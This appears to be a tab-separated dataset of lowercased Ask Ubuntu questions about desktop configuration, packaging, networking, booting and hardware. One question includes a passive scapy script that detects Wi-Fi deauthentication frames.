339457	how change system font color ubuntu 12.04	i 've been searching but i ca n't get a specific guide to changing ubuntu 12.04 lts ' font color . i am using the dfcon editor to change the background and base color of the system , the code being : bg_color : # 202020 ; selected_bg_color : # 00ff00 ; base_color : # white but the desktop icon and gui applications are unreadable : so there is any easy way for linux beginners to change this boring gray font ?
339458	how to make a new window open in the same workspace where i opened it ?	i open some application and immediately switch to another workspace since it takes some time to open . when it opens , i want it to open in the workspace where i opened it , not in the workspace where i am at when it opens . note that i do n't want it to associate an application with a viewport . any application must be openable in any workspace . is this possible ?
339461	is there an easy guide on how to prepare my python3 script for upload to my ppa ?	i have a python3 script ( 4000 loc ) written in pyqt4 with four , five dependencies . in the same folder where that script is placed there are some subfolders where all additional files ( icons , saves , sounds , translations ) are placed . i want to upload it to my a ppa which i had already created . i 've read `` uploading a package to a ppa '' but i do n't understand it . is there any step-by-step instruction for beginners ? it seems harder to me to create a ppa than writing the whole program .
339462	how to keep network manager from creating multiple named networks for the same actual network ?	network manager is connecting to the same network but keeps creating different `` profiles '' like thomson , thomson1 , thomson 2 . how can i fix this , so it always shows and connects to the same network by the same name ? output of lspci -nn : 00:00.0 host bridge [ 0600 ] : intel corporation 3rd gen core processor dram controller [ 8086:0154 ] ( rev 09 ) 00:02.0 vga compatible controller [ 0300 ] : intel corporation 3rd gen core processor graphics controller [ 8086:0166 ] ( rev 09 ) 00:14.0 usb controller [ 0c03 ] : intel corporation 7 series/c210 series chipset family usb xhci host controller [ 8086:1e31 ] ( rev 04 ) 00:16.0 communication controller [ 0780 ] : intel corporation 7 series/c210 series chipset family mei controller # 1 [ 8086:1e3a ] ( rev 04 ) 00:1a.0 usb controller [ 0c03 ] : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 2 [ 8086:1e2d ] ( rev 04 ) 00:1b.0 audio device [ 0403 ] : intel corporation 7 series/c210 series chipset family high definition audio controller [ 8086:1e20 ] ( rev 04 ) 00:1c.0 pci bridge [ 0604 ] : intel corporation 7 series/c210 series chipset family pci express root port 1 [ 8086:1e10 ] ( rev c4 ) 00:1c.1 pci bridge [ 0604 ] : intel corporation 7 series/c210 series chipset family pci express root port 2 [ 8086:1e12 ] ( rev c4 ) 00:1d.0 usb controller [ 0c03 ] : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 1 [ 8086:1e26 ] ( rev 04 ) 00:1f.0 isa bridge [ 0601 ] : intel corporation hm76 express chipset lpc controller [ 8086:1e59 ] ( rev 04 ) 00:1f.2 sata controller [ 0106 ] : intel corporation 7 series chipset family 6-port sata controller [ ahci mode ] [ 8086:1e03 ] ( rev 04 ) 00:1f.3 smbus [ 0c05 ] : intel corporation 7 series/c210 series chipset family smbus controller [ 8086:1e22 ] ( rev 04 ) 01:00.0 ethernet controller [ 0200 ] : qualcomm atheros ar8161 gigabit ethernet [ 1969:1091 ] ( rev 10 ) 02:00.0 network controller [ 0280 ] : realtek semiconductor co. , ltd. rtl8723ae pcie wireless network adapter [ 10ec:8723 ] output of nm-tool : networkmanager tool state : connected ( global ) - device : wlan0 [ infinitum440c ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : 802.11 wifi driver : rtl8723ae state : connected default : yes hw address : c0 : d9:62:47 : e1 : ad capabilities : speed : 72 mb/s wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points ( * = current ap ) infinitum4813 : infra , 10:47:80:15 : b6:51 , freq 2462 mhz , rate 54 mb/s , strength 30 wpa wpa2 *infinitum440c : infra , e0:24:7f:38:06:4d , freq 2462 mhz , rate 54 mb/s , strength 83 wpa wpa2 corpen : infra , 00:60 : b3:44 : f5 : d3 , freq 2422 mhz , rate 54 mb/s , strength 18 wep infinitumca0c : infra , e0:24:7f:37 : f8 : d3 , freq 2462 mhz , rate 54 mb/s , strength 40 wpa wpa2 infinitum4d0d : infra , 00:46:4b : c9:2b:56 , freq 2412 mhz , rate 54 mb/s , strength 26 wpa wpa2 infinitumc413 : infra , 10:47:80:15:9e : cd , freq 2437 mhz , rate 54 mb/s , strength 27 wpa wpa2 facinet15 : infra , 00:15:6d:67:39:10 , freq 2427 mhz , rate 11 mb/s , strength 100 ipv4 settings : address : 192.168.1.50 prefix : 24 ( 255.255.255.0 ) gateway : 192.168.1.254 dns : 8.8.8.8 dns : 8.8.4.4 - device : eth0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : alx state : unavailable default : no hw address : 00:8c : fa:40:7e:4a capabilities : carrier detect : yes wired properties carrier : off
339465	what version of ruby am i really running ?	im running ubuntu 12.04 lts and have installed ruby via rvm . problem is when i just type ruby -v into the terminal it says that my ruby version is 1.8.7 and using the shotgun gem for sinatra it replies back as well with saying that im running ruby 1.8.7 . now when i type rvm list is shows that the only version of ruby that i have installed is 2.0.0 and it is my current and default version . i installed ruby 2.0.0 via rvm and is the only version i had installed on my machine . how do i know what version am i really on and how do i set 2.0.0 as my only version ?
339469	i ca n't boot windows 8 after installing ubuntu	i 'm using a hp desktop with windows 8 pre installed . i turned off fast boot and secure boot and have installed ubuntu . i can boot into ubuntu without any problem however i ca n't boot into windows . when i try it says error : invalid efi . so i ran boot repair and now there are multiple options . some still say the same thing . one goes to a windows menu and gives me the option to repair using a disk but when i use it the computer shuts down . on some of the boot options listed the screen will go black with a blue windows logo in the center and a white `` loading '' circle under it , i have left it alone for up to 4 hours with it not leaving that screen . and finally one goes to a blue windows looking screen with no text and never loads further , similar to the black screen . here is the link to my boot repair : http : //paste.ubuntu.com/6045602/ anyone have any ideas on what 's wrong or how to fix it ?
339475	is my isp throttling ubuntu ?	today i just installed ubuntu 13.04 on my macbook air . i noticed that the internet speed ( as well as torrent , direct download and wget speed ) is no more than 50kb/s ... i have another pc in the house and the speed is the same . assuming i have a 20*mbyte*/s connection speed and on my macbook with os x the speed was always around 1mbit/s , how can this be possible ? i noticed also a big slow down in loading pages ( i think this is related to my internet speed being throttled ) . on my nexus 4 , the speed is always 700kbit/s so it is not a modem issue ... i think this is related to ubuntu.. thank for help , lorenzo edit : dennis helped me find out that i had so me ports blocked and using gufw i opened them . thank you dennis !
339476	intel linux graphic drivers	i want to install the intel linux graphics drivers through the program , but everytime i 've tried to install them this error comes up w : gpg error : https : //download.01.org ubuntu release : the following signatures could n't be verified because the public key is not available : no_pubkey 8d8847d52f4aaa66 w : failed to fetch http : //ppa.launchpad.net/openshot.developers/ppa/ubuntu/dists/raring/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . how do i fix this ; i really want to install this so i can play games from steam . processor : intel速 celeron ( r ) m cpu 440 @ 1.86ghz graphics : intel速 945gm x86/mmx/sse2 32-bit ubuntu 13.04
339477	is buffalo drivestation ddr compatible with ubuntu ?	please excuse any ignorance on my part , i 'm not the most tech savvy . i purchased a buffalo drivestation ddr . the hard drive says it 's compatible with mac and windows os . does this mean i am unable to use it with my ubuntu laptop ?
339478	vsftpd not starting	i have installed vsftpd on ubuntu raring ringtail , and made a few changes to the config file . when i try to run with these changes , the service never starts . reverting to default config , the service then runs . here is my config file i got the changes from this guide : howto : easy ftp with vsftpd i ca n't figure out the problem , as i do n't know what half of it means ...
339480	disk usage analyser does not display correct disk size ( using multiple mount points )	i 'm running ubuntu 13.04 on an acer aspire s3 , and everything is going pretty smoothly . however , one thing that i did notice was an error in disk usage analyser i have the caching ssd that was used by windows 8 now mounted at / , with the 500 gb hard drive mounted as /home , to store all the large files . however , it lists the file system as 20gb is this intentional ? it makes judging hard drive usage difficult . any enlightenment would be appreciated thanks , jack ps . as you can probably tell by the fact that this is the most urgent problem i have , the experience with ubuntu on this laptop has been pretty flawless so far !
339484	how to assign administratives rights/privileges to a user ?	i have added a user in ubuntu 12.04 lts , but that user is setup only as `` standard '' . i also have a user with full administrative rights ( which i presume i will use to make any access rights changes ) . how do i change my `` standard '' user to admin in ubuntu 12.04 lts ?
339491	recording videos with heaphones with a built in mic	i have a pair of beats solo hd with a built in mic and i plan to use them to record my voice and record videos so i can upload them to youtube . my problem is that my computer wo n't recognize the mic . i can hear the sound perfectly when watching a video but i ca n't seem to get the mic to work . is there something i need to turn on or something i should download to make this work ; i have an hp 530 running a 32-bit version of ubuntu 13.04 an intel® celeron ( r ) m cpu 440 @ 1.86ghz , an intel® 945gm x86/mmx/sse2 graphics card and 1 gb of memory . note : this link might help out http : //www.alsa-project.org/db/ ? f=7c ... 2…
339492	sd card auto-mounting problems in 12.04 , workaround does not work , `` bogus alignment '' on rescan	i am using ubuntu 12.04 on a compaq hp presario . this question was the first search result , so i thought i was victim to this bug , but the workaround does not work . in another question i read that i should do `` tail -f /var/log/syslog '' , so i did that and entered the line `` echo 1 > /sys/bus/pci/rescan '' in another terminal , and the last line of these appears : sep 2 01:17:01 lealaptop cron [ 5183 ] : ( root ) cmd ( cd / & & run-parts -- report /etc/cron.hourly ) sep 2 01:18:51 lealaptop dhclient : dhcprequest of 172.20.80.36 on eth0 to 172.20.65.109 port 67 sep 2 01:18:51 lealaptop dhclient : dhcpack of 172.20.80.36 from 172.20.65.109 sep 2 01:18:51 lealaptop dhclient : bound to 172.20.80.36 -- renewal in 281 seconds . sep 2 01:23:32 lealaptop dhclient : dhcprequest of 172.20.80.36 on eth0 to 172.20.65.109 port 67 sep 2 01:23:32 lealaptop dhclient : dhcpack of 172.20.80.36 from 172.20.65.109 sep 2 01:23:32 lealaptop dhclient : bound to 172.20.80.36 -- renewal in 290 seconds . sep 2 01:28:22 lealaptop dhclient : dhcprequest of 172.20.80.36 on eth0 to 172.20.65.109 port 67 sep 2 01:28:22 lealaptop dhclient : dhcpack of 172.20.80.36 from 172.20.65.109 sep 2 01:28:22 lealaptop dhclient : bound to 172.20.80.36 -- renewal in 299 seconds . sep 2 01:30:51 lealaptop kernel : [ 25709.564109 ] nvidia 0000:01:00.0 : bar 6 : [ ? ? ? 0x00000000 flags 0x2 ] has bogus alignment rebooting with the sd card works , but that 's a really annoying workaround . what else could i do ?
339495	how can i mount my galaxy s4 on ubuntu 12.04	this is the error message i get when i plug my s4 into the usb port : error initializing camera : -1 : unspecified error how can i correct this ?
339499	bash taking a lot of time to load	so when i open a terminal ( ctrl+alt+t ) it takes about 6 seconds to the prompt to show , and i can observe ( running top on another terminal ) that it is taking 99 % of the cpu to do that . what can be causing that ? it loaded instantly before . i 'm running ubuntu 13.04 , my cpu is an intel core i7-2600k @ 3.4ghz and i have 16gb of ram . ~/.profile : # ~/.profile : executed by the command interpreter for login shells . # this file is not read by bash ( 1 ) , if ~/.bash_profile or ~/.bash_login # exists . # see /usr/share/doc/bash/examples/startup-files for examples . # the files are located in the bash-doc package . # the default umask is set in /etc/profile ; for setting the umask # for ssh logins , install and configure the libpam-umask package . # umask 022 # if running bash if [ -n `` $ bash_version '' ] ; then # include .bashrc if it exists if [ -f `` $ home/.bashrc '' ] ; then . `` $ home/.bashrc '' fi fi # set path so it includes user 's private bin if it exists if [ -d `` $ home/bin '' ] ; then path= '' $ home/bin : $ path '' fi export path=/usr/local/cuda-5.0/bin : $ path export ld_library_path=/usr/local/cuda-5.0/lib : /usr/local/cuda-5.0/lib64 : $ ld_library_path export ps1= '' \e [ 0 ; 31m [ \u @ \h \w ] \ $ \e [ m '' ~/bashrc : # ~/.bashrc : executed by bash ( 1 ) for non-login shells . # see /usr/share/doc/bash/examples/startup-files ( in the package bash-doc ) # for examples # if not running interactively , do n't do anything [ -z `` $ ps1 '' ] & & return # do n't put duplicate lines or lines starting with space in the history . # see bash ( 1 ) for more options histcontrol=ignoreboth # append to the history file , do n't overwrite it shopt -s histappend # for setting history length see histsize and histfilesize in bash ( 1 ) histsize=1000 histfilesize=2000 # check the window size after each command and , if necessary , # update the values of lines and columns . shopt -s checkwinsize # if set , the pattern `` ** '' used in a pathname expansion context will # match all files and zero or more directories and subdirectories . # shopt -s globstar # make less more friendly for non-text input files , see lesspipe ( 1 ) [ -x /usr/bin/lesspipe ] & & eval `` $ ( shell=/bin/sh lesspipe ) '' # set variable identifying the chroot you work in ( used in the prompt below ) if [ -z `` $ debian_chroot '' ] & & [ -r /etc/debian_chroot ] ; then debian_chroot= $ ( cat /etc/debian_chroot ) fi # set a fancy prompt ( non-color , unless we know we `` want '' color ) case `` $ term '' in xterm-color ) color_prompt=yes ; ; esac # uncomment for a colored prompt , if the terminal has the capability ; turned # off by default to not distract the user : the focus in a terminal window # should be on the output of commands , not on the prompt force_color_prompt=yes if [ -n `` $ force_color_prompt '' ] ; then if [ -x /usr/bin/tput ] & & tput setaf 1 > & /dev/null ; then # we have color support ; assume it 's compliant with ecma-48 # ( iso/iec-6429 ) . ( lack of such support is extremely rare , and such # a case would tend to support setf rather than setaf . ) color_prompt=yes else color_prompt= fi fi if [ `` $ color_prompt '' = yes ] ; then ps1= ' $ { debian_chroot : + ( $ debian_chroot ) } \ [ \033 [ 01 ; 32m\ ] \u @ \h\ [ \033 [ 00m\ ] : \ [ \033 [ 01 ; 34m\ ] \w\ [ \033 [ 00m\ ] \ $ ' else ps1= ' $ { debian_chroot : + ( $ debian_chroot ) } \u @ \h : \w\ $ ' fi unset color_prompt force_color_prompt # if this is an xterm set the title to user @ host : dir case `` $ term '' in xterm*|rxvt* ) ps1= '' \ [ \e ] 0 ; $ { debian_chroot : + ( $ debian_chroot ) } \u @ \h : \w\a\ ] $ ps1 '' ; ; * ) ; ; esac # enable color support of ls and also add handy aliases if [ -x /usr/bin/dircolors ] ; then test -r ~/.dircolors & & eval `` $ ( dircolors -b ~/.dircolors ) '' || eval `` $ ( dircolors -b ) '' alias ls='ls -- color=auto' # alias dir='dir -- color=auto' # alias vdir='vdir -- color=auto' alias grep='grep -- color=auto' alias fgrep='fgrep -- color=auto' alias egrep='egrep -- color=auto' fi # some more ls aliases alias ll='ls -alf' alias la='ls -a' alias l='ls -cf' # add an `` alert '' alias for long running commands . use like so : # sleep 10 ; alert alias alert='notify-send -- urgency=low -i `` $ ( [ $ ? = 0 ] & & echo terminal || echo error ) '' `` $ ( history|tail -n1|sed -e '\ '' s/^\s* [ 0-9 ] \+\s*// ; s/ [ ; & | ] \s*alert $ //'\ '' ) '' ' # alias definitions . # you may want to put all your additions into a separate file like # ~/.bash_aliases , instead of adding them here directly . # see /usr/share/doc/bash-doc/examples in the bash-doc package . if [ -f ~/.bash_aliases ] ; then . ~/.bash_aliases fi # enable programmable completion features ( you do n't need to enable # this , if it 's already enabled in /etc/bash.bashrc and /etc/profile # sources /etc/bash.bashrc ) . if [ -f /etc/bash_completion ] & & ! shopt -oq posix ; then . /etc/bash_completion fi export path= $ path : /usr/local/cuda-5.0/bin export ld_library_path=/usr/local/cuda-5.0/lib64 : /lib export path= $ path : ~/bin bash -v output : # system-wide .bashrc file for interactive bash ( 1 ) shells . # to enable the settings / commands in this file for login shells as well , # this file has to be sourced in /etc/profile . # if not running interactively , do n't do anything [ -z `` $ ps1 '' ] & & return # check the window size after each command and , if necessary , # update the values of lines and columns . shopt -s checkwinsize # set variable identifying the chroot you work in ( used in the prompt below ) if [ -z `` $ { debian_chroot : - } '' ] & & [ -r /etc/debian_chroot ] ; then debian_chroot= $ ( cat /etc/debian_chroot ) fi # set a fancy prompt ( non-color , overwrite the one in /etc/profile ) ps1= ' $ { debian_chroot : + ( $ debian_chroot ) } \u @ \h : \w\ $ ' # commented out , do n't overwrite xterm -t `` title '' -n `` icontitle '' by default . # if this is an xterm set the title to user @ host : dir # case `` $ term '' in # xterm*|rxvt* ) # prompt_command='echo -ne `` \033 ] 0 ; $ { user } @ $ { hostname } : $ { pwd } \007 '' ' # ; ; # * ) # ; ; # esac # enable bash completion in interactive shells # if ! shopt -oq posix ; then # if [ -f /usr/share/bash-completion/bash_completion ] ; then # . /usr/share/bash-completion/bash_completion # elif [ -f /etc/bash_completion ] ; then # . /etc/bash_completion # fi # fi # sudo hint if [ ! -e `` $ home/.sudo_as_admin_successful '' ] & & [ ! -e `` $ home/.hushlogin '' ] ; then case `` $ ( groups ) `` in *\ admin\ * ) if [ -x /usr/bin/sudo ] ; then cat < < -eof to run a command as administrator ( user `` root '' ) , use `` sudo < command > '' . see `` man sudo_root '' for details . eof fi esac fi groups ) `` groups ) groups # if the command-not-found package is installed , use it if [ -x /usr/lib/command-not-found -o -x /usr/share/command-not-found/command-not-found ] ; then function command_not_found_handle { # check because c-n-f could 've been removed in the meantime if [ -x /usr/lib/command-not-found ] ; then /usr/lib/command-not-found -- `` $ 1 '' return $ ? elif [ -x /usr/share/command-not-found/command-not-found ] ; then /usr/share/command-not-found/command-not-found -- `` $ 1 '' return $ ? else printf `` % s : command not found\n '' `` $ 1 '' > & 2 return 127 fi } fi # ~/.bashrc : executed by bash ( 1 ) for non-login shells . # see /usr/share/doc/bash/examples/startup-files ( in the package bash-doc ) # for examples # if not running interactively , do n't do anything [ -z `` $ ps1 '' ] & & return # do n't put duplicate lines or lines starting with space in the history . # see bash ( 1 ) for more options histcontrol=ignoreboth # append to the history file , do n't overwrite it shopt -s histappend # for setting history length see histsize and histfilesize in bash ( 1 ) histsize=1000 histfilesize=2000 # check the window size after each command and , if necessary , # update the values of lines and columns . shopt -s checkwinsize # if set , the pattern `` ** '' used in a pathname expansion context will # match all files and zero or more directories and subdirectories . # shopt -s globstar # make less more friendly for non-text input files , see lesspipe ( 1 ) [ -x /usr/bin/lesspipe ] & & eval `` $ ( shell=/bin/sh lesspipe ) '' shell=/bin/sh lesspipe ) '' shell=/bin/sh lesspipe ) shell=/bin/sh lesspipe export lessopen= '' | /usr/bin/lesspipe % s '' ; export lessclose= '' /usr/bin/lesspipe % s % s '' ; # set variable identifying the chroot you work in ( used in the prompt below ) if [ -z `` $ debian_chroot '' ] & & [ -r /etc/debian_chroot ] ; then debian_chroot= $ ( cat /etc/debian_chroot ) fi # set a fancy prompt ( non-color , unless we know we `` want '' color ) case `` $ term '' in xterm-color ) color_prompt=yes ; ; esac # uncomment for a colored prompt , if the terminal has the capability ; turned # off by default to not distract the user : the focus in a terminal window # should be on the output of commands , not on the prompt force_color_prompt=yes if [ -n `` $ force_color_prompt '' ] ; then if [ -x /usr/bin/tput ] & & tput setaf 1 > & /dev/null ; then # we have color support ; assume it 's compliant with ecma-48 # ( iso/iec-6429 ) . ( lack of such support is extremely rare , and such # a case would tend to support setf rather than setaf . ) color_prompt=yes else color_prompt= fi fi if [ `` $ color_prompt '' = yes ] ; then ps1= ' $ { debian_chroot : + ( $ debian_chroot ) } \ [ \033 [ 01 ; 32m\ ] \u @ \h\ [ \033 [ 00m\ ] : \ [ \033 [ 01 ; 34m\ ] \w\ [ \033 [ 00m\ ] \ $ ' else ps1= ' $ { debian_chroot : + ( $ debian_chroot ) } \u @ \h : \w\ $ ' fi unset color_prompt force_color_prompt # if this is an xterm set the title to user @ host : dir case `` $ term '' in xterm*|rxvt* ) ps1= '' \ [ \e ] 0 ; $ { debian_chroot : + ( $ debian_chroot ) } \u @ \h : \w\a\ ] $ ps1 '' ; ; * ) ; ; esac # enable color support of ls and also add handy aliases if [ -x /usr/bin/dircolors ] ; then test -r ~/.dircolors & & eval `` $ ( dircolors -b ~/.dircolors ) '' || eval `` $ ( dircolors -b ) '' alias ls='ls -- color=auto' # alias dir='dir -- color=auto' # alias vdir='vdir -- color=auto' alias grep='grep -- color=auto' alias fgrep='fgrep -- color=auto' alias egrep='egrep -- color=auto' fi dircolors -b ) '' dircolors -b ) dircolors -b ls_colors='rs=0 : di=01 ; 34 : ln=01 ; 36 : mh=00 : pi=40 ; 33 : so=01 ; 35 : do=01 ; 35 : bd=40 ; 33 ; 01 : cd=40 ; 33 ; 01 : or=40 ; 31 ; 01 : su=37 ; 41 : sg=30 ; 43 : ca=30 ; 41 : tw=30 ; 42 : ow=34 ; 42 : st=37 ; 44 : ex=01 ; 32 : *.tar=01 ; 31 : *.tgz=01 ; 31 : *.arj=01 ; 31 : *.taz=01 ; 31 : *.lzh=01 ; 31 : *.lzma=01 ; 31 : *.tlz=01 ; 31 : *.txz=01 ; 31 : *.zip=01 ; 31 : *.z=01 ; 31 : *.z=01 ; 31 : *.dz=01 ; 31 : *.gz=01 ; 31 : *.lz=01 ; 31 : *.xz=01 ; 31 : *.bz2=01 ; 31 : *.bz=01 ; 31 : *.tbz=01 ; 31 : *.tbz2=01 ; 31 : *.tz=01 ; 31 : *.deb=01 ; 31 : *.rpm=01 ; 31 : *.jar=01 ; 31 : *.war=01 ; 31 : *.ear=01 ; 31 : *.sar=01 ; 31 : *.rar=01 ; 31 : *.ace=01 ; 31 : *.zoo=01 ; 31 : *.cpio=01 ; 31 : *.7z=01 ; 31 : *.rz=01 ; 31 : *.jpg=01 ; 35 : *.jpeg=01 ; 35 : *.gif=01 ; 35 : *.bmp=01 ; 35 : *.pbm=01 ; 35 : *.pgm=01 ; 35 : *.ppm=01 ; 35 : *.tga=01 ; 35 : *.xbm=01 ; 35 : *.xpm=01 ; 35 : *.tif=01 ; 35 : *.tiff=01 ; 35 : *.png=01 ; 35 : *.svg=01 ; 35 : *.svgz=01 ; 35 : *.mng=01 ; 35 : *.pcx=01 ; 35 : *.mov=01 ; 35 : *.mpg=01 ; 35 : *.mpeg=01 ; 35 : *.m2v=01 ; 35 : *.mkv=01 ; 35 : *.webm=01 ; 35 : *.ogm=01 ; 35 : *.mp4=01 ; 35 : *.m4v=01 ; 35 : *.mp4v=01 ; 35 : *.vob=01 ; 35 : *.qt=01 ; 35 : *.nuv=01 ; 35 : *.wmv=01 ; 35 : *.asf=01 ; 35 : *.rm=01 ; 35 : *.rmvb=01 ; 35 : *.flc=01 ; 35 : *.avi=01 ; 35 : *.fli=01 ; 35 : *.flv=01 ; 35 : *.gl=01 ; 35 : *.dl=01 ; 35 : *.xcf=01 ; 35 : *.xwd=01 ; 35 : *.yuv=01 ; 35 : *.cgm=01 ; 35 : *.emf=01 ; 35 : *.axv=01 ; 35 : *.anx=01 ; 35 : *.ogv=01 ; 35 : *.ogx=01 ; 35 : *.aac=00 ; 36 : *.au=00 ; 36 : *.flac=00 ; 36 : *.mid=00 ; 36 : *.midi=00 ; 36 : *.mka=00 ; 36 : *.mp3=00 ; 36 : *.mpc=00 ; 36 : *.ogg=00 ; 36 : *.ra=00 ; 36 : *.wav=00 ; 36 : *.axa=00 ; 36 : *.oga=00 ; 36 : *.spx=00 ; 36 : *.xspf=00 ; 36 : ' ; export ls_colors # some more ls aliases alias ll='ls -alf' alias la='ls -a' alias l='ls -cf' # add an `` alert '' alias for long running commands . use like so : # sleep 10 ; alert alias alert='notify-send -- urgency=low -i `` $ ( [ $ ? = 0 ] & & echo terminal || echo error ) '' `` $ ( history|tail -n1|sed -e '\ '' s/^\s* [ 0-9 ] \+\s*// ; s/ [ ; & | ] \s*alert $ //'\ '' ) '' ' # alias definitions . # you may want to put all your additions into a separate file like # ~/.bash_aliases , instead of adding them here directly . # see /usr/share/doc/bash-doc/examples in the bash-doc package . if [ -f ~/.bash_aliases ] ; then . ~/.bash_aliases fi # enable programmable completion features ( you do n't need to enable # this , if it 's already enabled in /etc/bash.bashrc and /etc/profile # sources /etc/bash.bashrc ) . if [ -f /etc/bash_completion ] & & ! shopt -oq posix ; then . /etc/bash_completion fi . /usr/share/bash-completion/bash_completion # -*- shell-script -*- # # bash_completion - programmable completion functions for bash 4.1+ # # copyright âš 2006-2008 , ian macdonald < ian @ caliban.org > # âš 2009-2011 , bash completion maintainers # < bash-completion-devel @ lists.alioth.debian.org > # # this program is free software ; you can redistribute it and/or modify # it under the terms of the gnu general public license as published by # the free software foundation ; either version 2 , or ( at your option ) # any later version . # # this program is distributed in the hope that it will be useful , # but without any warranty ; without even the implied warranty of # merchantability or fitness for a particular purpose . see the # gnu general public license for more details . # # you should have received a copy of the gnu general public license # along with this program ; if not , write to the free software foundation , # inc. , 51 franklin street , fifth floor , boston , ma 02110-1301 usa . # # the latest version of this software can be obtained here : # # http : //bash-completion.alioth.debian.org/ # # release : 1.99 if [ [ $ - == *v* ] ] ; then bash_completion_original_v_value= '' -v '' else bash_completion_original_v_value= '' +v '' fi if [ [ $ { bash_completion_debug- } ] ] ; then set -v else set +v fi unset bash_completion_original_v_value # ex : ts=4 sw=4 et filetype=sh export path= $ path : /usr/local/cuda-5.0/bin export ld_library_path=/usr/local/cuda-5.0/lib64 : /lib export path= $ path : ~/bin when i run the command suggested by geirha the output stops a couple of seconds in the following lines , i do n't know if they point to the problem . + /home/miguel/.bashrc:10 : histcontrol=ignoreboth + /home/miguel/.bashrc:13 : shopt -s histappend + /home/miguel/.bashrc:16 : histsize=1000 + /home/miguel/.bashrc:17 : histfilesize=2000
339501	can not find/access files from previous install of ubuntu ( 10.04 )	i 've searched for this answer fairly extensively and fruitlessly thus far , mainly i find answers that regard finding windows files after installing ubuntu , and a lot of answers regarding wubi ( which i had to google ) - i do n't think those are relevant to my situation . my problem ; i ca n't access my old files from an install of ubuntu 10.04 i was running 10.04 . i upgraded to 12.04 with the updater , it froze up during the process , and i had to reboot . the computer would n't boot past the ubuntu loading screen . i used a ubuntu install disk of 11.10 to try to get it back on it 's feet ( and chose to install alongside the failed install of 12.04 ) . that worked , but now i want to figure out how i can access my old files . any help , points in the right direction , or anything really vastly appreciated ! edit1 : sudo fdisk -l output sudo fdisk -l disk /dev/sda : 160.0 gb , 160041885696 bytes 255 heads , 63 sectors/track , 19457 cylinders , total 312581808 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000bec1f device boot start end blocks id system /dev/sda1 * 2048 283774239 141886096 83 linux /dev/sda2 283774974 312580095 14402561 5 extended /dev/sda5 309653504 312580095 1463296 82 linux swap / solaris /dev/sda6 283774976 307574783 11899904 83 linux /dev/sda7 307576832 309653503 1038336 82 linux swap / solaris partition table entries are not in disk order
339505	is it normal for a google hangouts window around the desktop slows down my computer ( if other windows do n't do this ) ?	when i drag a google hangouts window around the desktop it slows down my computer , but other windows do n't cause this problem . is this normal ? i looked at the system load and can see that the cpu is spiking ... looks to be caused by the xorg process . $ uname -a linux foo-linux 3.2.0-51-generic-pae # 77-ubuntu smp wed jul 24 20:40:32 utc 2013 i686 athlon i386 gnu/linux $ sudo xorg -version x.org x server 1.11.3 release date : 2011-12-16 x protocol version 11 , revision 0 build operating system : linux 2.6.42-37-generic i686 ubuntu current operating system : linux andrew-linux 3.2.0-51-generic-pae # 77-ubuntu smp wed jul 24 20:40:32 utc 2013 i686 kernel command line : boot_image=/boot/vmlinuz-3.2.0-51-generic-pae root=uuid=6ee49df0-f1db-426b-a2e6-0c457f3cf541 ro quiet splash vt.handoff=7 build date : 11 april 2013 01:04:30pm xorg-server 2:1.11.4-0ubuntu10.13 ( for technical support please see http : //www.ubuntu.com/support ) current version of pixman : 0.24.4 before reporting problems , check http : //wiki.x.org to make sure that you have the latest version . xfce 4.8 chrome version 28.0.1500.95 cpu : amd athlon ( tm ) x2 dual core processor be-240 gpu : geforce 8800 gts 512 nvidia driver version : 319.32 vbios version:62.92.25.00.07 display devices : dell u2311h , dell e193fp ( 3200x1080 total )
339507	how can i use firefox with ubuntu firewall ( gufw ) ?	i do n't know how can i allow the permission for firefox in the gufw firewall . can someone help me please ?
339509	how to execute this specific python script ( attached in the question )	i have a small net and last 2 weeks i get a lot of disconnections on my wireless stations a friend of mine told me that 90 % i get attacked by deauth packets i i researched a bit and found this py script . but unfortunately i could n't find any help on how to use it.. i m really new on linux is there anyone willing to help ? # ! /usr/bin/env python # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # authwatch.py v. 0.1 ( quick , dirty and loud ) - by tinman # place card in monitor mode and set the channel . # if you want channel hopping , run airodump-ng in # another terminal . will add channel hopping # in the next version . # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # usage : python authwatch.py # import sys from scapy import * interface = sys.argv [ 1 ] def sniffreq ( p ) : if p.haslayer ( dot11deauth ) : # look for a deauth packet and print the ap bssid , client bssid and the reason for the deauth . print p.sprintf ( `` deauth found from ap [ % dot11.addr2 % ] client [ % dot11.addr1 % ] , reason [ % dot11deauth.reason % ] '' ) # look for an association request packet and print the station bssid , client bssid , ap info . if p.haslayer ( dot11assoreq ) : print p.sprintf ( `` association request from station [ % dot11.addr1 % ] , client [ % dot11.addr2 % ] , ap [ % dot11elt.info % ] '' ) # look for an authentication packet and print the client and ap bssid if p.haslayer ( dot11auth ) : print p.sprintf ( `` authentication request from [ % dot11.addr1 % ] to ap [ % dot11.addr2 % ] '' ) print p.sprintf ( `` -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- '' ) sniff ( iface=interface , prn=sniffreq )
339513	installing firstclass missing dependency	so i 'm working for a school and they want me to install a communication program called firstclass . it has a .deb called fcc-10.014-linux.i686.deb . i tried clicking on it and it opened the software center . it said dependency not satisfiable libqt3-mt|libqt3c102-mt . the instructions say : command line installation instructions debian intel ( also for use on ubuntu , knoppix , and other debian x86 derivatives ) : # su password : ****** # dpkg -i fcc-10.014-linux.i686.deb when i type these nothing happens . do i need to direct it to a directory where it is stored ? i tried throwing the file in home and navigating the terminal there to put in the commands . firstclass is a free download from here http : //www.firstclass.com/resources/clientdownloads thanks
339515	install fail `` parted ca n't resize partitions managed by window dynamic disk ''	how to solve the problem ? ( the existing system is windows 7 , 64-bit . )
